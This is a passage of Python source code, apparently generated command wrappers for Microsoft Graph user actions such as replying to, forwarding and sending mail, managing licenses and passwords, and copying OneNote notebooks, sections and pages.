                                               importance=None,
                                               inference_classification=None,
                                               internet_message_headers=None,
                                               internet_message_id=None,
                                               is_delivery_receipt_requested=None,
                                               is_draft=None,
                                               is_read=None,
                                               is_read_receipt_requested=None,
                                               parent_folder_id=None,
                                               received_date_time=None,
                                               reply_to=None,
                                               sender=None,
                                               sent_date_time=None,
                                               subject=None,
                                               to_recipients=None,
                                               unique_body=None,
                                               web_link=None,
                                               attachments=None,
                                               extensions=None,
                                               multi_value_extended_properties=None,
                                               single_value_extended_properties=None):
    """Create a draft reply-all to a message (Graph createReplyAll action).

    ``body`` is the message-body resource placed at message.body; the
    remaining keyword arguments populate the wrapped 'message' resource and
    are omitted from the request when None. ``from_`` maps to the
    'from_property' field ('from' is a Python reserved word and cannot be a
    parameter name).
    """
    payload = {}
    if comment is not None:
        payload['comment'] = comment
    # Build the payload under a distinct local name: the original code
    # shadowed the 'body' parameter with the payload dict and then assigned
    # the dict to itself (a circular reference), losing the caller's body.
    message = {'body': body}
    optional = (
        ('id', id_), ('categories', categories), ('change_key', change_key),
        ('created_date_time', created_date_time),
        ('last_modified_date_time', last_modified_date_time),
        ('bcc_recipients', bcc_recipients), ('body_preview', body_preview),
        ('cc_recipients', cc_recipients), ('conversation_id', conversation_id),
        ('conversation_index', conversation_index), ('flag', flag),
        ('from_property', from_), ('has_attachments', has_attachments),
        ('importance', importance),
        ('inference_classification', inference_classification),
        ('internet_message_headers', internet_message_headers),
        ('internet_message_id', internet_message_id),
        ('is_delivery_receipt_requested', is_delivery_receipt_requested),
        ('is_draft', is_draft), ('is_read', is_read),
        ('is_read_receipt_requested', is_read_receipt_requested),
        ('parent_folder_id', parent_folder_id),
        ('received_date_time', received_date_time), ('reply_to', reply_to),
        ('sender', sender), ('sent_date_time', sent_date_time),
        ('subject', subject), ('to_recipients', to_recipients),
        ('unique_body', unique_body), ('web_link', web_link),
        ('attachments', attachments), ('extensions', extensions),
        ('multi_value_extended_properties', multi_value_extended_properties),
        ('single_value_extended_properties', single_value_extended_properties),
    )
    for key, value in optional:
        if value is not None:
            message[key] = value
    # 'body' is always present, so the message dict is never empty; the
    # original "delete if empty" branch was dead code and is dropped.
    payload['message'] = message
    return client.create_reply_all(user_id=user_id,
                                   message_id=message_id,
                                   body=payload)
def usersactions_usersmessage_forward(client,
                                      user_id,
                                      message_id,
                                      body,
                                      to_recipients=None,
                                      comment=None,
                                      id_=None,
                                      categories=None,
                                      change_key=None,
                                      created_date_time=None,
                                      last_modified_date_time=None,
                                      bcc_recipients=None,
                                      body_preview=None,
                                      cc_recipients=None,
                                      conversation_id=None,
                                      conversation_index=None,
                                      flag=None,
                                      from_=None,
                                      has_attachments=None,
                                      importance=None,
                                      inference_classification=None,
                                      internet_message_headers=None,
                                      internet_message_id=None,
                                      is_delivery_receipt_requested=None,
                                      is_draft=None,
                                      is_read=None,
                                      is_read_receipt_requested=None,
                                      parent_folder_id=None,
                                      received_date_time=None,
                                      reply_to=None,
                                      sender=None,
                                      sent_date_time=None,
                                      subject=None,
                                      microsoft_graph_message_to_recipients=None,
                                      unique_body=None,
                                      web_link=None,
                                      attachments=None,
                                      extensions=None,
                                      multi_value_extended_properties=None,
                                      single_value_extended_properties=None):
    """Forward a message (Graph forward action).

    ``body`` is the message-body resource placed at message.body; the
    remaining keyword arguments populate the wrapped 'message' resource and
    are omitted from the request when None. ``from_`` maps to the
    'from_property' field ('from' is a Python reserved word and cannot be a
    parameter name). ``microsoft_graph_message_to_recipients`` maps to the
    message-level 'to_recipients' field, distinct from the action-level
    ``to_recipients``.
    """
    payload = {}
    if to_recipients is not None:
        payload['to_recipients'] = to_recipients
    if comment is not None:
        payload['comment'] = comment
    # Build the payload under a distinct local name: the original code
    # shadowed the 'body' parameter with the payload dict and then assigned
    # the dict to itself (a circular reference), losing the caller's body.
    message = {'body': body}
    optional = (
        ('id', id_), ('categories', categories), ('change_key', change_key),
        ('created_date_time', created_date_time),
        ('last_modified_date_time', last_modified_date_time),
        ('bcc_recipients', bcc_recipients), ('body_preview', body_preview),
        ('cc_recipients', cc_recipients), ('conversation_id', conversation_id),
        ('conversation_index', conversation_index), ('flag', flag),
        ('from_property', from_), ('has_attachments', has_attachments),
        ('importance', importance),
        ('inference_classification', inference_classification),
        ('internet_message_headers', internet_message_headers),
        ('internet_message_id', internet_message_id),
        ('is_delivery_receipt_requested', is_delivery_receipt_requested),
        ('is_draft', is_draft), ('is_read', is_read),
        ('is_read_receipt_requested', is_read_receipt_requested),
        ('parent_folder_id', parent_folder_id),
        ('received_date_time', received_date_time), ('reply_to', reply_to),
        ('sender', sender), ('sent_date_time', sent_date_time),
        ('subject', subject),
        ('to_recipients', microsoft_graph_message_to_recipients),
        ('unique_body', unique_body), ('web_link', web_link),
        ('attachments', attachments), ('extensions', extensions),
        ('multi_value_extended_properties', multi_value_extended_properties),
        ('single_value_extended_properties', single_value_extended_properties),
    )
    for key, value in optional:
        if value is not None:
            message[key] = value
    # 'body' is always present, so the message dict is never empty; the
    # original "delete if empty" branch was dead code and is dropped.
    payload['message'] = message
    return client.forward(user_id=user_id,
                          message_id=message_id,
                          body=payload)
def usersactions_usersmessage_move(client,
                                   user_id,
                                   message_id,
                                   destination_id=None):
    """Move a message to the folder identified by ``destination_id``."""
    payload = {k: v for k, v in (('destination_id', destination_id),)
               if v is not None}
    return client.move(user_id=user_id,
                       message_id=message_id,
                       body=payload)
def usersactions_usersmessage_reply(client,
                                    user_id,
                                    message_id,
                                    body,
                                    comment=None,
                                    id_=None,
                                    categories=None,
                                    change_key=None,
                                    created_date_time=None,
                                    last_modified_date_time=None,
                                    bcc_recipients=None,
                                    body_preview=None,
                                    cc_recipients=None,
                                    conversation_id=None,
                                    conversation_index=None,
                                    flag=None,
                                    from_=None,
                                    has_attachments=None,
                                    importance=None,
                                    inference_classification=None,
                                    internet_message_headers=None,
                                    internet_message_id=None,
                                    is_delivery_receipt_requested=None,
                                    is_draft=None,
                                    is_read=None,
                                    is_read_receipt_requested=None,
                                    parent_folder_id=None,
                                    received_date_time=None,
                                    reply_to=None,
                                    sender=None,
                                    sent_date_time=None,
                                    subject=None,
                                    to_recipients=None,
                                    unique_body=None,
                                    web_link=None,
                                    attachments=None,
                                    extensions=None,
                                    multi_value_extended_properties=None,
                                    single_value_extended_properties=None):
    """Reply to a message (Graph reply action).

    ``body`` is the message-body resource placed at message.body; the
    remaining keyword arguments populate the wrapped 'message' resource and
    are omitted from the request when None. ``from_`` maps to the
    'from_property' field ('from' is a Python reserved word and cannot be a
    parameter name).
    """
    payload = {}
    if comment is not None:
        payload['comment'] = comment
    # Build the payload under a distinct local name: the original code
    # shadowed the 'body' parameter with the payload dict and then assigned
    # the dict to itself (a circular reference), losing the caller's body.
    message = {'body': body}
    optional = (
        ('id', id_), ('categories', categories), ('change_key', change_key),
        ('created_date_time', created_date_time),
        ('last_modified_date_time', last_modified_date_time),
        ('bcc_recipients', bcc_recipients), ('body_preview', body_preview),
        ('cc_recipients', cc_recipients), ('conversation_id', conversation_id),
        ('conversation_index', conversation_index), ('flag', flag),
        ('from_property', from_), ('has_attachments', has_attachments),
        ('importance', importance),
        ('inference_classification', inference_classification),
        ('internet_message_headers', internet_message_headers),
        ('internet_message_id', internet_message_id),
        ('is_delivery_receipt_requested', is_delivery_receipt_requested),
        ('is_draft', is_draft), ('is_read', is_read),
        ('is_read_receipt_requested', is_read_receipt_requested),
        ('parent_folder_id', parent_folder_id),
        ('received_date_time', received_date_time), ('reply_to', reply_to),
        ('sender', sender), ('sent_date_time', sent_date_time),
        ('subject', subject), ('to_recipients', to_recipients),
        ('unique_body', unique_body), ('web_link', web_link),
        ('attachments', attachments), ('extensions', extensions),
        ('multi_value_extended_properties', multi_value_extended_properties),
        ('single_value_extended_properties', single_value_extended_properties),
    )
    for key, value in optional:
        if value is not None:
            message[key] = value
    # 'body' is always present, so the message dict is never empty; the
    # original "delete if empty" branch was dead code and is dropped.
    payload['message'] = message
    return client.reply(user_id=user_id,
                        message_id=message_id,
                        body=payload)
def usersactions_usersmessage_reply_all(client,
                                        user_id,
                                        message_id,
                                        body,
                                        comment=None,
                                        id_=None,
                                        categories=None,
                                        change_key=None,
                                        created_date_time=None,
                                        last_modified_date_time=None,
                                        bcc_recipients=None,
                                        body_preview=None,
                                        cc_recipients=None,
                                        conversation_id=None,
                                        conversation_index=None,
                                        flag=None,
                                        from_=None,
                                        has_attachments=None,
                                        importance=None,
                                        inference_classification=None,
                                        internet_message_headers=None,
                                        internet_message_id=None,
                                        is_delivery_receipt_requested=None,
                                        is_draft=None,
                                        is_read=None,
                                        is_read_receipt_requested=None,
                                        parent_folder_id=None,
                                        received_date_time=None,
                                        reply_to=None,
                                        sender=None,
                                        sent_date_time=None,
                                        subject=None,
                                        to_recipients=None,
                                        unique_body=None,
                                        web_link=None,
                                        attachments=None,
                                        extensions=None,
                                        multi_value_extended_properties=None,
                                        single_value_extended_properties=None):
    """Reply-all to a message (Graph replyAll action).

    ``body`` is the message-body resource placed at message.body; the
    remaining keyword arguments populate the wrapped 'message' resource and
    are omitted from the request when None. ``from_`` maps to the
    'from_property' field ('from' is a Python reserved word and cannot be a
    parameter name).
    """
    payload = {}
    if comment is not None:
        payload['comment'] = comment
    # Build the payload under a distinct local name: the original code
    # shadowed the 'body' parameter with the payload dict and then assigned
    # the dict to itself (a circular reference), losing the caller's body.
    message = {'body': body}
    optional = (
        ('id', id_), ('categories', categories), ('change_key', change_key),
        ('created_date_time', created_date_time),
        ('last_modified_date_time', last_modified_date_time),
        ('bcc_recipients', bcc_recipients), ('body_preview', body_preview),
        ('cc_recipients', cc_recipients), ('conversation_id', conversation_id),
        ('conversation_index', conversation_index), ('flag', flag),
        ('from_property', from_), ('has_attachments', has_attachments),
        ('importance', importance),
        ('inference_classification', inference_classification),
        ('internet_message_headers', internet_message_headers),
        ('internet_message_id', internet_message_id),
        ('is_delivery_receipt_requested', is_delivery_receipt_requested),
        ('is_draft', is_draft), ('is_read', is_read),
        ('is_read_receipt_requested', is_read_receipt_requested),
        ('parent_folder_id', parent_folder_id),
        ('received_date_time', received_date_time), ('reply_to', reply_to),
        ('sender', sender), ('sent_date_time', sent_date_time),
        ('subject', subject), ('to_recipients', to_recipients),
        ('unique_body', unique_body), ('web_link', web_link),
        ('attachments', attachments), ('extensions', extensions),
        ('multi_value_extended_properties', multi_value_extended_properties),
        ('single_value_extended_properties', single_value_extended_properties),
    )
    for key, value in optional:
        if value is not None:
            message[key] = value
    # 'body' is always present, so the message dict is never empty; the
    # original "delete if empty" branch was dead code and is dropped.
    payload['message'] = message
    return client.reply_all(user_id=user_id,
                            message_id=message_id,
                            body=payload)
def usersactions_usersmessage_send(client,
                                   user_id,
                                   message_id):
    """Send an existing draft message."""
    return client.send(user_id=user_id, message_id=message_id)
def usersactions_user_assign_license(client,
                                     user_id,
                                     add_licenses=None,
                                     remove_licenses=None):
    """Add and/or remove license assignments for a user."""
    payload = {k: v for k, v in (('add_licenses', add_licenses),
                                 ('remove_licenses', remove_licenses))
               if v is not None}
    return client.assign_license(user_id=user_id, body=payload)
def usersactions_user_change_password(client,
                                      user_id,
                                      current_password=None,
                                      new_password=None):
    """Change a user's password; omitted fields are not sent."""
    payload = {k: v for k, v in (('current_password', current_password),
                                 ('new_password', new_password))
               if v is not None}
    return client.change_password(user_id=user_id, body=payload)
def usersactions_user_check_member_group(client,
                                         user_id,
                                         group_ids=None):
    """Check which of the given groups the user is a member of."""
    payload = {k: v for k, v in (('group_ids', group_ids),) if v is not None}
    return client.check_member_groups(user_id=user_id, body=payload)
def usersactions_user_check_member_object(client,
                                          user_id,
                                          ids=None):
    """Check which of the given directory objects the user is a member of."""
    payload = {k: v for k, v in (('ids', ids),) if v is not None}
    return client.check_member_objects(user_id=user_id, body=payload)
def usersactions_user_export_personal_data(client,
                                           user_id,
                                           storage_location=None):
    """Export a user's personal data to the given storage location."""
    payload = {k: v for k, v in (('storage_location', storage_location),)
               if v is not None}
    return client.export_personal_data(user_id=user_id, body=payload)
def usersactions_user_find_meeting_time(client,
                                        user_id,
                                        body):
    """Find candidate meeting times; ``body`` is forwarded unchanged."""
    return client.find_meeting_times(user_id=user_id, body=body)
def usersactions_user_get_available_extension_property(client,
                                                       is_synced_from_on_premises=None):
    """List available extension properties.

    ``is_synced_from_on_premises`` defaults to False when not supplied.
    """
    payload = {'is_synced_from_on_premises':
               False if is_synced_from_on_premises is None
               else is_synced_from_on_premises}
    return client.get_available_extension_properties(body=payload)
def usersactions_user_get_by_id(client,
                                ids=None,
                                types=None):
    """Fetch directory objects by id, optionally filtered by type."""
    payload = {k: v for k, v in (('ids', ids), ('types', types))
               if v is not None}
    return client.get_by_ids(body=payload)
def usersactions_user_get_mail_tip(client,
                                   user_id,
                                   email_addresses=None,
                                   mail_tips_options=None):
    """Get mail tips for the given addresses."""
    payload = {k: v for k, v in (('email_addresses', email_addresses),
                                 ('mail_tips_options', mail_tips_options))
               if v is not None}
    return client.get_mail_tips(user_id=user_id, body=payload)
def usersactions_user_get_member_group(client,
                                       user_id,
                                       security_enabled_only=None):
    """List the groups the user is a member of.

    ``security_enabled_only`` defaults to False when not supplied.
    """
    payload = {'security_enabled_only':
               False if security_enabled_only is None else security_enabled_only}
    return client.get_member_groups(user_id=user_id, body=payload)
def usersactions_user_get_member_object(client,
                                        user_id,
                                        security_enabled_only=None):
    """List the directory objects the user is a member of.

    ``security_enabled_only`` defaults to False when not supplied.
    """
    payload = {'security_enabled_only':
               False if security_enabled_only is None else security_enabled_only}
    return client.get_member_objects(user_id=user_id, body=payload)
def usersactions_user_remove_all_device_from_management(client,
                                                        user_id):
    """Remove all of a user's devices from management."""
    return client.remove_all_devices_from_management(user_id=user_id)
def usersactions_user_reprocess_license_assignment(client,
                                                   user_id):
    """Reprocess license assignments for a user."""
    return client.reprocess_license_assignment(user_id=user_id)
def usersactions_user_restore(client,
                              user_id):
    """Restore a deleted user."""
    return client.restore(user_id=user_id)
def usersactions_user_revoke_sign_in_session(client,
                                             user_id):
    """Revoke all of a user's sign-in sessions."""
    return client.revoke_sign_in_sessions(user_id=user_id)
def usersactions_user_send_mail(client,
                                user_id,
                                body,
                                save_to_sent_items=None,
                                id_=None,
                                categories=None,
                                change_key=None,
                                created_date_time=None,
                                last_modified_date_time=None,
                                bcc_recipients=None,
                                body_preview=None,
                                cc_recipients=None,
                                conversation_id=None,
                                conversation_index=None,
                                flag=None,
                                from_=None,
                                has_attachments=None,
                                importance=None,
                                inference_classification=None,
                                internet_message_headers=None,
                                internet_message_id=None,
                                is_delivery_receipt_requested=None,
                                is_draft=None,
                                is_read=None,
                                is_read_receipt_requested=None,
                                parent_folder_id=None,
                                received_date_time=None,
                                reply_to=None,
                                sender=None,
                                sent_date_time=None,
                                subject=None,
                                to_recipients=None,
                                unique_body=None,
                                web_link=None,
                                attachments=None,
                                extensions=None,
                                multi_value_extended_properties=None,
                                single_value_extended_properties=None):
    """Send a mail message (Graph sendMail action).

    ``body`` is the message-body resource placed at message.body;
    ``save_to_sent_items`` defaults to False when not supplied. The remaining
    keyword arguments populate the wrapped 'message' resource and are omitted
    from the request when None. ``from_`` maps to the 'from_property' field
    ('from' is a Python reserved word and cannot be a parameter name).
    """
    payload = {'save_to_sent_items':
               False if save_to_sent_items is None else save_to_sent_items}
    # Build the payload under a distinct local name: the original code
    # shadowed the 'body' parameter with the payload dict and then assigned
    # the dict to itself (a circular reference), losing the caller's body.
    message = {'body': body}
    optional = (
        ('id', id_), ('categories', categories), ('change_key', change_key),
        ('created_date_time', created_date_time),
        ('last_modified_date_time', last_modified_date_time),
        ('bcc_recipients', bcc_recipients), ('body_preview', body_preview),
        ('cc_recipients', cc_recipients), ('conversation_id', conversation_id),
        ('conversation_index', conversation_index), ('flag', flag),
        ('from_property', from_), ('has_attachments', has_attachments),
        ('importance', importance),
        ('inference_classification', inference_classification),
        ('internet_message_headers', internet_message_headers),
        ('internet_message_id', internet_message_id),
        ('is_delivery_receipt_requested', is_delivery_receipt_requested),
        ('is_draft', is_draft), ('is_read', is_read),
        ('is_read_receipt_requested', is_read_receipt_requested),
        ('parent_folder_id', parent_folder_id),
        ('received_date_time', received_date_time), ('reply_to', reply_to),
        ('sender', sender), ('sent_date_time', sent_date_time),
        ('subject', subject), ('to_recipients', to_recipients),
        ('unique_body', unique_body), ('web_link', web_link),
        ('attachments', attachments), ('extensions', extensions),
        ('multi_value_extended_properties', multi_value_extended_properties),
        ('single_value_extended_properties', single_value_extended_properties),
    )
    for key, value in optional:
        if value is not None:
            message[key] = value
    # 'body' is always present, so the message dict is never empty; the
    # original "delete if empty" branch was dead code and is dropped.
    payload['message'] = message
    return client.send_mail(user_id=user_id, body=payload)
def usersactions_user_translate_exchange_id(client,
                                            user_id,
                                            input_ids=None,
                                            target_id_type=None,
                                            source_id_type=None):
    """Translate Exchange identifiers between id formats."""
    payload = {k: v for k, v in (('input_ids', input_ids),
                                 ('target_id_type', target_id_type),
                                 ('source_id_type', source_id_type))
               if v is not None}
    return client.translate_exchange_ids(user_id=user_id, body=payload)
def usersactions_user_validate_property(client,
                                        entity_type=None,
                                        display_name=None,
                                        mail_nickname=None,
                                        on_behalf_of_user_id=None):
    """Validate directory object properties before creation/update."""
    payload = {k: v for k, v in (('entity_type', entity_type),
                                 ('display_name', display_name),
                                 ('mail_nickname', mail_nickname),
                                 ('on_behalf_of_user_id', on_behalf_of_user_id))
               if v is not None}
    return client.validate_properties(body=payload)
def usersactions_user_wipe_managed_app_registration_by_device_tag(
        client, user_id, device_tag=None):
    """Call client.wipe_managed_app_registrations_by_device_tag for the user.

    device_tag is included in the body only when the caller supplied it.
    """
    body = {} if device_tag is None else {'device_tag': device_tag}
    return client.wipe_managed_app_registrations_by_device_tag(
        user_id=user_id, body=body)
def usersactions_usersonenotenotebook_copy_notebook(
        client, user_id, notebook_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                notebook_id=notebook_id,
                                body=body)
def usersactions_usersonenotenotebook_get_notebook_from_web_url(
        client, user_id, web_url=None):
    """Call client.get_notebook_from_web_url; web_url is sent only when supplied."""
    body = {} if web_url is None else {'web_url': web_url}
    return client.get_notebook_from_web_url(user_id=user_id, body=body)
def usersactions_usersonenotenotebookssectiongroupsparentnotebook_copy_notebook(
        client, user_id, notebook_id, section_group_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                notebook_id=notebook_id,
                                section_group_id=section_group_id,
                                body=body)
def usersactions_usersonenotenotebookssectiongroupssection_copy_to_notebook(
        client, user_id, notebook_id, section_group_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   notebook_id=notebook_id,
                                   section_group_id=section_group_id,
                                   onenote_section_id=onenote_section_id,
                                   body=body)
def usersactions_usersonenotenotebookssectiongroupssection_copy_to_section_group(
        client, user_id, notebook_id, section_group_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        notebook_id=notebook_id,
                                        section_group_id=section_group_id,
                                        onenote_section_id=onenote_section_id,
                                        body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspage_copy_to_section(
        client, user_id, notebook_id, section_group_id,
        onenote_section_id, onenote_page_id,
        id_=None, group_id=None, site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section(user_id=user_id,
                                  notebook_id=notebook_id,
                                  section_group_id=section_group_id,
                                  onenote_section_id=onenote_section_id,
                                  onenote_page_id=onenote_page_id,
                                  body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspage_onenote_patch_content(
        client, user_id, notebook_id, section_group_id,
        onenote_section_id, onenote_page_id, commands=None):
    """Call client.onenote_patch_content; commands are sent only when supplied."""
    body = {} if commands is None else {'commands': commands}
    return client.onenote_patch_content(user_id=user_id,
                                        notebook_id=notebook_id,
                                        section_group_id=section_group_id,
                                        onenote_section_id=onenote_section_id,
                                        onenote_page_id=onenote_page_id,
                                        body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspagesparentnotebook_copy_notebook(
        client, user_id, notebook_id, section_group_id,
        onenote_section_id, onenote_page_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                notebook_id=notebook_id,
                                section_group_id=section_group_id,
                                onenote_section_id=onenote_section_id,
                                onenote_page_id=onenote_page_id,
                                body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspagesparentsection_copy_to_notebook(
        client, user_id, notebook_id, section_group_id,
        onenote_section_id, onenote_page_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   notebook_id=notebook_id,
                                   section_group_id=section_group_id,
                                   onenote_section_id=onenote_section_id,
                                   onenote_page_id=onenote_page_id,
                                   body=body)
def usersactions_usersonenotenotebookssectiongroupssectionspagesparentsection_copy_to_section_group(
        client, user_id, notebook_id, section_group_id,
        onenote_section_id, onenote_page_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        notebook_id=notebook_id,
                                        section_group_id=section_group_id,
                                        onenote_section_id=onenote_section_id,
                                        onenote_page_id=onenote_page_id,
                                        body=body)
def usersactions_usersonenotenotebookssectiongroupssectionsparentnotebook_copy_notebook(
        client, user_id, notebook_id, section_group_id, onenote_section_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                notebook_id=notebook_id,
                                section_group_id=section_group_id,
                                onenote_section_id=onenote_section_id,
                                body=body)
def usersactions_usersonenotenotebookssection_copy_to_notebook(
        client, user_id, notebook_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   notebook_id=notebook_id,
                                   onenote_section_id=onenote_section_id,
                                   body=body)
def usersactions_usersonenotenotebookssection_copy_to_section_group(
        client, user_id, notebook_id, onenote_section_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        notebook_id=notebook_id,
                                        onenote_section_id=onenote_section_id,
                                        body=body)
def usersactions_usersonenotenotebookssectionspage_copy_to_section(
        client, user_id, notebook_id, onenote_section_id, onenote_page_id,
        id_=None, group_id=None, site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section(user_id=user_id,
                                  notebook_id=notebook_id,
                                  onenote_section_id=onenote_section_id,
                                  onenote_page_id=onenote_page_id,
                                  body=body)
def usersactions_usersonenotenotebookssectionspage_onenote_patch_content(
        client, user_id, notebook_id, onenote_section_id,
        onenote_page_id, commands=None):
    """Call client.onenote_patch_content; commands are sent only when supplied."""
    body = {} if commands is None else {'commands': commands}
    return client.onenote_patch_content(user_id=user_id,
                                        notebook_id=notebook_id,
                                        onenote_section_id=onenote_section_id,
                                        onenote_page_id=onenote_page_id,
                                        body=body)
def usersactions_usersonenotenotebookssectionspagesparentnotebook_copy_notebook(
        client, user_id, notebook_id, onenote_section_id, onenote_page_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                notebook_id=notebook_id,
                                onenote_section_id=onenote_section_id,
                                onenote_page_id=onenote_page_id,
                                body=body)
def usersactions_usersonenotenotebookssectionspagesparentsection_copy_to_notebook(
        client, user_id, notebook_id, onenote_section_id, onenote_page_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_notebook(user_id=user_id,
                                   notebook_id=notebook_id,
                                   onenote_section_id=onenote_section_id,
                                   onenote_page_id=onenote_page_id,
                                   body=body)
def usersactions_usersonenotenotebookssectionspagesparentsection_copy_to_section_group(
        client, user_id, notebook_id, onenote_section_id, onenote_page_id,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_section_group.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_to_section_group(user_id=user_id,
                                        notebook_id=notebook_id,
                                        onenote_section_id=onenote_section_id,
                                        onenote_page_id=onenote_page_id,
                                        body=body)
def usersactions_usersonenotenotebookssectionsparentnotebook_copy_notebook(
        client, user_id, notebook_id, onenote_section_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                notebook_id=notebook_id,
                                onenote_section_id=onenote_section_id,
                                body=body)
def usersactions_usersonenotenotebookssectionsparentsectiongroupparentnotebook_copy_notebook(
        client, user_id, notebook_id, onenote_section_id,
        group_id=None, rename_as=None, notebook_folder=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_notebook."""
    opts = {'group_id': group_id, 'rename_as': rename_as,
            'notebook_folder': notebook_folder,
            'site_collection_id': site_collection_id, 'site_id': site_id}
    body = {k: v for k, v in opts.items() if v is not None}
    return client.copy_notebook(user_id=user_id,
                                notebook_id=notebook_id,
                                onenote_section_id=onenote_section_id,
                                body=body)
def usersactions_usersonenotenotebookssectionsparentsectiongroupsection_copy_to_notebook(
        client, user_id, notebook_id, onenote_section_id, onenote_section_id1,
        id_=None, group_id=None, rename_as=None,
        site_collection_id=None, site_id=None):
    """Build a body from the optional copy settings and call client.copy_to_notebook.

    Note: id_ is sent under the body key 'id'.
    """
    opts = {'id': id_, 'group_id': group_id, 'rename_as': rename_as,
            'site_collection_id': site_collection_id, 'site_id': site_id}
